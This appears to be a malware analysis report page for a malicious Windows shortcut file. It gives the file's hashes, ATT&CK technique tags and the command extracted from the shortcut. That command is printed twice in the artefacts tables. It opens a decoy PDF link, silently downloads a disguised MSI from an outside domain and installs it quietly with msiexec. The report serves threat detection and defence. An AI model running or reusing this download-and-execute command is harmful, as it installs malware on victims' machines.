Malicious
5827a1d6eed09c4afd130b12fa38a5a1
LNK File | MD5: 5827a1d6eed09c4afd130b12fa38a5a1 | Size: 3.03 KB | application/x-ms-shortcut
LNK File
MD5: 5827a1d6eed09c4afd130b12fa38a5a1
Size: 3.03 KB
application/x-ms-shortcut
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 5827a1d6eed09c4afd130b12fa38a5a1
|
| Sha1 | c10ff092fdc86835459ebc21f77d0082b4873dd2
|
| Sha256 | cc4e91ffc44e87127a9c233d685084c2c9817a659cfd9b4dedb14dfcbd1e2ae9
|
| Sha384 | 9b22a23af2ff5ea37b88debe5f3772a385061bd70870a46e98fd5e250b5a0fc939e38f96d70b528d0de5512304a849af
|
| Sha512 | a55b8d7b935cb6db1c9c33fb1d0da538d17269d9e81292736a40257757d1ac13eb48111a1e661ffe130eff4d446b708b10949a6bfa2521917793758d7713dcf1
|
| SSDeep | 24:8DS5XfJ7kv0qGV7Agx+/5+0NBnnlMVRa/Sbdd+5CwiXuHY8pLar/4XI7Tmm:8DSBlkZ3BxnlMW2dyRiXuHdLaroum
|
| TLSH | BF51C0122BEA0725F3F25D7A58B29716967BF955E9618F1D019181480852A00EC38FAB
|
File Structure
5827a1d6eed09c4afd130b12fa38a5a1
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /k start msedge http://myprojectdocs.com/Delay_Report_08.2025.pdf & curl -sLo %TEMP%\bosfortuy.ms http://myprojectdocs.com/file/setup7492.pdf & msiexec /i %TEMP%\bosfortuy.ms /qn | Taskkill /f /im cmd.exe |
5827a1d6eed09c4afd130b12fa38a5a1 (3.03 KB)
File Structure
5827a1d6eed09c4afd130b12fa38a5a1
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /k start msedge http://myprojectdocs.com/Delay_Report_08.2025.pdf & curl -sLo %TEMP%\bosfortuy.ms http://myprojectdocs.com/file/setup7492.pdf & msiexec /i %TEMP%\bosfortuy.ms /qn | Taskkill /f /im cmd.exe Malicious |
5827a1d6eed09c4afd130b12fa38a5a1 |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.